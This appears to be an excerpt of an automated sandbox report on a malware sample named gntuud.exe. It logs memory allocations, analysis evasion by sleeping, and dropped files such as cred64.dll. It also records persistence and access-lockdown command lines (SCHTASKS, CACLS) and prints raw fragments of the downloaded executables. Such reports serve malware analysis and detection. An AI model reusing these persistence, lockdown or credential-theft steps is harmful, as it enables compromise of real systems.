protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02881000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02882000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description gntuud.exe tried to sleep 191 seconds, actually delayed analysis time by 191 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 2406921
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9858748416
root_path: C:\Users
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\00001#Success.potm
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\00002#Wikipedia.potm
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\00000#Fireplace.potm
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\Engine.exe
file C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
file C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
file C:\Users\test22\AppData\Roaming\c33e9ad058e5d3\cred64.dll
file C:\Users\test22\1000019012\syncfiles.dll
file C:\Users\test22\1000018002\avicapn32.exe
file C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
file C:\Users\test22\AppData\Local\Temp\kak1dt10.3sz\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline powershell get-process avastui
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /c cmd < Fireplace.potm
file C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
file C:\Users\test22\1000018002\avicapn32.exe
file C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
file C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\Engine.exe
file C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
file C:\Users\test22\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\1000018002\avicapn32.exe
parameters:
filepath: C:\Users\test22\1000018002\avicapn32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\1000019012\syncfiles.dll, rundll
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00320000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€hrº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†¨E‘cð. &âˆ;j°ƒ@93Ÿ` ˆxp]  9`¬}(pv€87*qGv;7à``^NsFAbb[ÀM:@À4.ps1S[" P;@@l^D/X#s1œ p;@@aAyXB94]x €;@@n9Mms2uS8 ;€À7u=]29J1,  ;@À*<5LK<h`h°;@ÀUg$Va';zÀ;@ÀdA:<*dF(ýŸ:Ð; `r,Ht]nHV@ pv @Àm$m2M1,9,מ€v؞`ho?%]P5Wl¬`æž@@lNMkoK?T]pèž@À¾¬yÞ-ÁVÓ}LœxpÃܐv’÷…–&þp°ƒ¸rÂÂúƒ½£Â+ßžÈ%ðë…š¯Ð3ê¸Ò&„ÕAUHÇD$côèu—R– ÚÿJ 1#ÇÆ΅ î8 »Üq-1†‘ôö~†tüö·™ÒÎDŀ!1JýfÝö*°ÍÎSDÑ LI©=1‡…$ÛÎ4[ % õ‚’01¯œéöG˜—áö–ãzÏÎeƒc<1D†ß«º þnªº©'iû˜Ír8 zÙ£B"譠ب[Ë5; HE[Ó-{W9úÈÎD*w$C6Æٟ&ÜÿgqÝÅñù:° ÷/ t ŒLÅæóT™Ÿ ̪‰@Œ±ð3xÅü³·™LËlLG”ÅÌÚMiòsKô³šD× Œ¼øóó2Å]ÌBE‚ Œ*­Åå3nÑÂé³o}ÇL;¤ŸKÀ; gŒ~|1_˜ªñ× 3lØ)gÍMG<_×@Iå˜PÿB혹¼¯Ã 4¶0_t´P̘Yë†Ü ê­çg-؟,_é¼Ê j;4gŒ‹¤!_q¦ªø˜)‘¡ð˜G¢LÞ £BU-_ÕgŠ¾Ôj‡Î¹TÝÜ[K1ހĘ£—²”üU ö¾-êfB݀G+ŸSƒòÓ°gIÿùõzqW6H³GÒäò•˜øÄã¸û‘tƒ‡ŒM!«àó'ìñ ÌÕô.ŒkÜiö3Eènú
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ‹@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL à ð#®öT¥`C@àĶÂ@¬æ­dpÃÎavÁØàÁ$‡€8.texteï#ð# `.rdataÐP$Rô#@@.data B`CLFC@À.idataÜ°I’F@À.n3DK0mÀIn–F@@.symtab0KH@.n3DK18B@K:BH `.n3DK2€@Š@À.n3DK3ðE4F4FŠ `.reloc$‡àÁˆŒ¾@@.rsrcÎapÃbÀ@@‹$ÃÌÌÌÌÌÌÌÌÌÌÌ̋ $ÃÌÌÌÌÌÌÌÌÌÌÌ̋$ÃÌÌÌÌÌÌÌÌÌÌÌ̋$ÃÌÌÌÌÌÌÌÌÌÌÌ̋,$ÃÌÌÌÌÌÌÌÌÌÌÌ̋4$ÃÌÌÌÌÌÌÌÌÌÌÌ̋<$ÃÌÌÌÌÌÌÌÌÌÌÌÌÿ Go build ID: "1XoObtThoSIQHB6rxJ2Y/4S4zZYswWvya58Ng_HPC/svauRJsvdL7i5fW18Myu/93NVhBdX9dg_MUSFHSGe" ÿÌÌÌÌÌÌÌÌÌd‹ ‹‰;av ƒìè&‹D$ ‰$‹D$‰D$èƒÄÃèùëÇÌÌÌÌÌÌÌd‹ ‹‰;a†ÕƒìD‹\$H‹l$Lë‰Í‰ó…í„1Àéĸÿÿÿÿ…À}1É1ö‰èë'9臋p9õ‚w)ō}ÿ‰ù‡ß÷ۇßÁÿ!þރø|°;cpu.u¨1Ò锺ÿÿÿÿ‰L$,‰t$@…ÒŒI9‡ ƒú‚ jü‰l$‡Ý÷ۇÝÁýƒå4+z9ø‚á‰l$(‰t$4)Ѝhÿ‰l$‡Ý÷ۇÝÁý!ï,;‰l$0ƒøu f}onufƒøëƒøu\f}ofuT|;€?fuKƒø‡Ý”Ç݃úu!f>alu‹|$(\;€;lu ‹Ô¸†1À镈D$•‹Ô¸†‰T$(‹\$1Àéß耍ÁGi‰$ÇD$è戋D$0‰$‹D$‰D$è҈z¸i‰$ÇD$ 輈‹D$4‰$‹D$‰D$計ìi‰$ÇD$蒈耋L$,‹t$@éCþÿÿ‰D$‰\$8蓍}¿i‰$ÇD$!è]ˆ‹D$8‰$‹D$‰D$èIˆìi‰$ÇD$è3ˆè¾‹L$,‹t$@éäýÿÿ‹Ô¸†‹ и†…Àt‰D$,1ÒëƒÄDÃÁ¶Y ¶i ‹q‹9‰|$@‹y•„À•ts„Ûtm¶.•„À•ud‰|$(‰T$$‰L$<èê~ÿ†i‰$ÇD$贇‹D$@‰$‹D$(‰D$蠇3zi‰$ÇD$芇è‹D$,‹L$<‹T$$ëˆB9Џgÿÿÿé^ÿÿÿ@9è4ýÿÿƒÛ4€>,uéé&ýÿÿB9dýÿÿƒ¤,€}=uèéUýÿÿE¶l$‹t$49Ѝ¤‹=膋-Ô¸†9èƒñ‰ÅÁà‹t‹<9Þuȉl$$‰D$ ‰<$‹D$4‰D$‰t$è*¶D$ „Àu‹L$,‹T$(‹\$‹l$$둋 Ô¸†‹膋D$$9ȃ‹l$ ÆD+ ‹ Ô¸†‹и†9Èso¶|$—ˆD+ —‹L$,‹t$@é9üÿÿè‘}F¬i‰$ÇD$è[†‹D$4‰$‹D$‰D$èG†ìi‰$ÇD$è1†è¼}‹L$,‹t$@éâûÿÿè:è5‰éè.‡ÍˆL ‡ÍF‰Ó9Ø}.‹5Ô¸†‹=и†9ðs0‰ÆÁàÆD ‹=Ô¸†‰Ú‹и†9þrÃë ‹t$@é‰ûÿÿ‰ð‰ùè݉ñèÖ‰Á‰øè-¸‰Ñè!‰Ñ‰Âè؉Á‰Ð诉ð‰éè‰Á‰ê轉é薐èé ûÿÿÌÌÌÌÌÌÌÌÌÌÌd‹ ‹‰;a†;ƒìXà£e‰$蹡‹D$Ç@ ­i‰ ¡1‰‰HÇ@ °i‰H  1‰‰HÇ@$ i‰H  ¦1‰‰H(Ç@4  z$i‰H0 ©1‰‰H8Ç@D îi‰H@ «1‰‰HHÇÔ¸†Çظ†‹ €,‰…Éu‰и†ë =и†è(èË$ƒøK‹ Ô¸†Q‹膋-ظ†9ÕsW‰D$(`og‰$‰\$‰L$‰l$ ‰T$è,¡‹D$‹L$‹T$‰ظ†‹€,‰…Òu‰и†ë =и†è­‰Ã‹D$(Q‰Ô¸†ÁáÇD fÇD ‹€,‰< l t ‰t$Tt ‰t$Pt ‰t$Lt (‰t$Ht 0‰t$Dt 8‰t$@t @‰t$<t H…Òuèi‰ ª1‰‰T ë‰Âèiè‰ïª1‰è‰ÐÇD fÇD ‹€,‰…Òui‰T ¬1‰‰T ë"‹|$T‰Âiè΋|$P¬1‰è¿‰ÐÇD $fÇD ,‹€,‰…ÒuNi‰T ®1‰‰T (ë"‹|$L‰ÂNiè}‹|$H®1‰èn‰ÐÇD 4fÇD <‹€,‰…ÒuSi‰T 0¯1‰‰T 8ë"‹|$D‰ÂSiè,‹|$@¯1‰è‰ÐÇD DfÇD L‹€,‰…ÒuXi‰T @­1‰‰T Hë ‹|$<‰ÁXièÛ‰÷­1‰èΉȃø/‹ Ô¸†Q‹膋-ظ†9ÕsO`og‰$‰\$‰L$‰l$ ‰T$èܞ‹D$‹L$‹T$‰ظ†‹€,‰…Òu‰и†ë =и†è]‰ÃQ‰Ô¸†ÁáÇD fÇD ‹€,‰< l t ‰ðt ‰t$8t ‰t$Tt (‰t$4t 0‰t$Lt 8‰t$0t @‰t$Dt H…Òu¶i‰ ¢1‰‰T ë‰Â¶ièӉ1‰èƉÐÇD fÇD ‹€,‰…ÒuDi‰T £1‰‰T ë‰ÇDi舋|$8£1‰èyÇD $fÇD ,‹€,‰…ÒuTi‰T ¤1‰‰T (ë‹|$TTiè;‹|$4¤1‰è,ÇD 4fÇD <‹€,‰…ÒuXi‰T 0¥1‰‰T 8ë‹|$LXièî‹|$0¥1‰èßÇD DfÇD L‹€,‰…ÒuÈi‰D @§1‰‰D Hë‹|$DÈi衉÷§1‰è”Ç$ÇD$èà‹D$ƒø‚À‰D$$Ç$€ÇD$軋D$‰à(‰Ç$ÇD$蝋D$©•Áˆ ¬1‰©•Áˆ ©
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL8âobà!  "@=XT@°¶„Ft¤/¯E< f ¶^sА¶Ô0Cx*;>%1sXOœ! `7rP!Ni:jE@@@bkE<E2?8PP@À8*7`JoyqdÂB` `0Ys'"rSd¤0C@ÀnUPwRZiKEs@CFs `$u!6XeN&Ԑ¶Ps@@K)'tLNvc ¶Vs@@Æ?_:x«^4T0U^ޔcHl±Ð7J¾‘®ÚW’ÅY¬¨ öWT}J0¯†Ýµ5¨øª³&×­é߶‰EœNÂf+ÅfďD%Àðëf;ðùï‹„ç3Ãù5u+ rÑÈé@ñx÷æ–)nֆ"Ü^ï?mˆSƲ܍f:M£›o]µ¬–r„Ê;m%´e=´BÙ‚mîþ$­eh¾Ã"‘ D­"¸4}mÖé„í²zGôMQ±–D]Ôo>½rB@†m½E-MùD–°ÍâIVáÚ_Ø2Ƴ&ÞØl°epъ{ {ࡍ½þìÓþ@ûç¦@nîÑxÄ9Lçÿÿÿ:‚Iàù;ïLñ·™Goúo ¨Ø!Ë}ÇKÿ]ÎXv]‰Óöýlã:b3d;¸”ñrBÜø‚ 6»;ºS‘B2@x)Š‚xِr­ÿ }ù'ˆE­à2·Ê‹ã7\çÿÿÿj–g°»mŽåiŸu‡Ñþp%]ɹ žÛ„ïæ=yÝŸY éŒ\ƒ[<›)µ±2Ñ?­6 èÙä‚O­ é’Ò–2·¥‰]‘É5  ‰qeemLçÿÿÿñøCïËÎL)’òe–‘Ê"G¡ì܋úÿ6tZ4M7V¯Œ‚Tº¬Ëƒ)ÝÏ ~´íô9¸*×Ùô6‹Ðw bö“x5zM^4Û µ¢I$ÿ•UQH$9Õ£¢„:F*ú=<2³Ø'ŠæÄõ fäÁmÃa˦]˞ñ¼¥î —x—âb® yŽ¡HcE­‰òèÊtArŒ ¥Knj’6¯s“-Èþµ—e‹(ƒ]E®rŸSÒ&uIÁƒ"þ¨n—šR£¾ zrɳۨH=É;JìØ¡œ‡Aú®’䌍d݁ä~a™È§.h9ð,œÎáû|1ÃÛ}Ÿ¡)2Ó žÛªü½º£Å±häTÝxºã&uI}Þè/ÐÐ~#Ԝá5ÍöA„F~S''à%0Š ­ýhÿpÓürîG(A‹*hâý ò‘HE&uI–«í–X8)(új†álM ý˕¾äõLZ—¹Nàz $Weô’öÓÑõŸ¼;m‰âŒ&uIU’ {Ô¦4LKÀ2Y™LÁ³½*ÈÃ@žCphEN؝ˆ Žëw{Ҝò9èªó,…Æär2&uIÄ«Üh[ŒTMgò\aÅח|µ¸D„Ñš3-õ‹–læ±nE­ŒÖó3‚Z{dçy¥$½ ~¥üŒß?‹i]SŸ7ê&uI£ K¦K «*öù×õʉ_;.‘¥7·Æ5sòYë® ¢³ÙF>4×V§@;ÞÖ>*o&-h~:”¹$–qÕ"ãé€÷t¡Â˜ººØïü5Y!¯äΝi;pûÒe%­ô´ÛdT,ùä}ø8§Ä¶ãWµË{pÛ§`.lo&-hÛ|¢ŸO?q“ML»œÖ –"HGYÚ÷b mó%矂“uÆû{˜Lo&-h° ê@ ¦+f NÑ.eÓtWÝÍ%¢üa÷°CÐ۝Š,\̸’ÆyÙ±¶JñJ1'’ß1H§]dH·8¡íۥʆ2ºðª{jfSÊ dØ@ÀnêSšŒ+1¦Ø·¨µe@QPPk!ò‚5 ³#ÑÏËÿu5H§¥ÌÊøw؂0ý:eº¼T€ïvt>a†u†•s éÍtõÐCNá8%ïÅ5H§îKWD  Îã‡VÚUå2 _!×ZÓÚP sËÙ¤$š“dc¶äaÊ7Ç|f7uÿˆyIÛ§Å5H§?¿²¨ í?R¬¾§Å‡Ž°·ýÉÂ1%Lo.{û1H§›fßÈQå„NŸá҉žÑÉuK[K’õÒ°[íMÚÄÿþ»!*·ãîè>G²¶¶†d%W¯ç•5H§ ëþ¸ª4®byƒ¹:ù1ÚðÝíëÖøz:±Üg á!zòERîmð¾58§¹-Ó†£¢6â§6ÒÑ%5H§,èWlû,-sÅÚeøá:Àê|£y+•ã˜5 èègFÿÎ6ŠãÙë€\ÞÆ%5H§÷W¼y
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@€º´ Í!¸LÍ!This program must be run under Win32 $7PEL ^B*àŽ¡ œXöº¯°@»*Åu,ï³OX>›@~uà€»ÄFf5g\gWe7”š `zDthL)*@´°@Ànb"h!m#Yá ÐÀ$^+<%+dU&à@ÀZ-),j99tOð@P8"ikKHD[b÷C `k&l<0?<6üF@Àn[uZh3ex€luFnu `Uh%r6i!HÄ€»xu@P@ø@P&~œ´M‡t»Ž¦l‡ªm¥ü˜È怒 ’‚Þº29¬j˜¾e·‚ÔŠÆÔµÒ§‡êU¬nÉ¢ŒƒµÚU“.ø–¼Ó“ƒ¥)CÚÈ4ɇKð5ò ÖÆÅücð'=ˆ/Ê¥D¨¦6Çð¥x´hñtîÓ1(Ò%Mÿ.^zš=°ÏeÒÆ˘³Ûžâ²/Ë*#³j2A[·:¬átðjú5E£žŽµ9Eµ\¨‚ÒàýßÒ¸Ö¹b1cŝÝåXè) }õü!)ÞOÓ/ÊtAÃP¼iý矻õq¯¾ n·>ý)xDAÊàݵ2t°n“ˆ}¶7nˆìÌ€¢ ™ðpûym®CtP‹sæ¼RölEŠR/Œ=6VÁÉlcp­ÊÛ.md*Ï(Wâk[Z‡­ÐB§­T ˆgN/Ç*:ÍÐð¦‘/”¹-ŽÓH‚‡()ŸR›½Q‡WdçÕ&ž+Ý%;G¥¬£K¢êö]ñ;‘é1Sl€‡Ñ³¨ñ&ôÖo¼“jH¬ ðÂè3f ÿSLJNïقnC@¬bl¿¤¬K¢çl¬ýFUðã&nXRܬ•‡KÕà&žòCñˆÇLþЦ:‘[ú½¤wçè 8ËBPw.¼ãBpÕÝd!³imÕ»ûÁ ¼zP-´r——ĦUØ뎋 jˆi}üÞc–æ92wÃ=oa’L:i2Dœ&!f–ËUÊwëzñeoŠcôb,.Ji©~üãæüÙh‰Æ´—vâOՙ¿´²–™-?ë*†[¤¨hKU“î‰J+Û!í7™|i€1±„ t»w Ì,*:F´mh›ŽËâ`þi›ågÚ¸UZC9¨«ùñ½gq´MRI*¶º,–¶ù(ÑÜŤm÷–jRL¸;®`ØÒ;|«þ³ò–*ã0å_íf *kymbó ¼« l¡þèèŠT 7xòõ·'Ãd&`´€€ ñÆœ×<€-k¨o22;6OÅ"€È ú^Ȟv€oåVu “vòkƞš¼R½êá²`e „7ŸÖ8ËÐÁi¡A{ j6'?ì>MMÍó|L.¸ÇÚ+ Ç{4ïHM4 …²÷™3Dz3¨‰8 Ӗ7 A×d‹ Ê1#$é›ïsIÍað¸ó2‹Í°¦m gÎP â<áÖ°Bh3tSn˜ÍtŸU;spO^gQË°¸š³ZPœeh OA%ó2öhÅXî‰Ó/°ì0Î~Gî–&óÛÛÙØŠ¯lŒ™­ƒk¡%÷þ+£ÿNfˆþë ;BöúÜÎK–äÚdž’™žÏg-%„0ÚAŽ"œzö;YQî¢}™ 2:L'htV3ÚBÈÖÚ]‰á‡X¬&Í=ápT½€mV«Qå±¾ý˜KÃÕ¼z€‘ÿ´y `Ãkò€ŠÏ0ža€£/†<½9P>uÍÝxRÿa…ÒÐv ùF(žõ±'%PeTT¡sÂbýn_áœsŠ@}„_Ú`‚Uñ—·vxŠâ _·l§(L7¤ T" )|¤oqå—ß»öÉc t¬Û[ %éÉãLœ”NK­c2;ßJÇ[ðžµ! ²‡öÐÏЯY )AZc)+µecÒº ³áŸ-H„ᅐHÎÉ?b“¥Ð9cÑë>ôøcŸÍǯœa^ùéï}˜áÇj•m´ŸÕcéë׫œge(bƬvGcœ;æóbö@n΃!–' ^ÔלèQ]šQ´ßé Ü!b@ö»|ý(3œZã3ßÓñ…HcÍ耺c3k´érpc‡áÄ;2ß©Dœ[AûÕ|w¼bF© õ«’_ÅZ̪¢Þ% eeªU}I“÷s#M•y¦H?å|ø™Ö[x^Ulªi_çÕä_éb”ß²·Tc͈Õ= „V­Àcã¶À$Ԟu;‰¯j»|ºÕºD—lR¡-”{Ú몜 ½ Žb* ®]ÆÒ¼ œý ?ßa™Ô©ÀËøQ&5Ør¦M_­›¢¤^·Ì—ýûÏ Í±³c>S
request_handle: 0x00cc0018
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7EAGNVEZQGKAWCNHUVZUXOPPBYQUJWFGAMROJKHSZPZDZXVLKEWBECPBBEIJOFCYSÿ’PEL^B*àŽ xˆø†@`MÛ@Àê0<,ÿ’ÀÈ#ðCODEwx `DATA |@ÀBSSE °œÀ.idataêÀœ@À.tlsà°À.rdatað°@P.relocÈ#$²@P.rsrc<,0.Ö@PPò@P@Cardinalÿÿÿÿ@ Stringp@p@$9@09@49@89@,9@Ð7@ì7@(8@TObjectÿ%ÈÁB‹Àÿ%ÄÁB‹Àÿ%ÀÁB‹Àÿ%¼ÁB‹Àÿ%¸ÁB‹Àÿ%´ÁB‹Àÿ%°ÁB‹Àÿ%¬ÁB‹Àÿ%¨ÁB‹Àÿ%¤ÁB‹Àÿ% ÁB‹Àÿ%œÁB‹Àÿ%ÜÁB‹Àÿ%˜ÁB‹Àÿ%ØÁB‹Àÿ%”ÁB‹Àÿ%ÁB‹Àÿ%ŒÁB‹Àÿ%ˆÁB‹Àÿ%„ÁB‹Àÿ%€ÁB‹Àÿ%|ÁB‹Àÿ%xÁB‹Àÿ%tÁB‹Àÿ%pÁB‹Àÿ%lÁB‹Àÿ%hÁB‹Àÿ%ÔÁB‹Àÿ%dÁB‹Àÿ%`ÁB‹Àÿ%ìÁB‹Àÿ%èÁB‹Àÿ%äÁB‹Àÿ%\ÁB‹Àÿ%üÁB‹Àÿ%øÁB‹Àÿ%ôÁB‹Àÿ%XÁB‹Àÿ%TÁB‹Àÿ%PÁB‹Àÿ%LÁB‹ÀSƒÄ¼» TèiÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ%HÁB‹Àÿ%DÁB‹Àÿ%@ÁB‹Àÿ%<ÁB‹Àÿ%8ÁB‹Àÿ%4ÁB‹Àÿ%0ÁB‹Àÿ%,ÁB‹ÀSV¾àµBƒ>u:hDjè¨ÿÿÿ‹È…Éu3À^[áܵB‰‰ ܵB3ҋÂÀDÁ‹‰‰Bƒúduì‹‹‰^[Љ‰@ËÀSV‹ò‹Øèÿÿÿ…Àu3À^[ˉP‹V‰P ‹‰‰X‰B‰°^[ËP‹‰ ‰Q‹àµB‰£àµBÃSVWUQ‹ñ‰$‹è‹]‹$‹‰‹P‰V‹;‹‹SS ;Âu‹Ãè·ÿÿÿ‹C‰‹C FëF;Cu ‹Ãè›ÿÿÿ‹C F‹ß;ëuË֋ÅèVÿÿÿ„Àu3À‰Z]_^[ÃSVWUƒÄø‹Ø‹û‹2‹C;ðrp‹ÎJ‹èk ;Íwb;ðu‹BC‹B)C ƒ{ uH‹Ãè9ÿÿÿë?‹Î‹zϋèk ;Íu){ ë*‹ J‰ $‹{{ +ù‰|$+ð‰s ‹Ô‹ÃèÐþÿÿ„Àu3Àë °ë‹;ûu3ÀYZ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjèøýÿÿ‹ø‰;…ÿt#‹Ó¸äµBèlþÿÿ„Àuh€j‹PèÙýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUè¥ýÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh 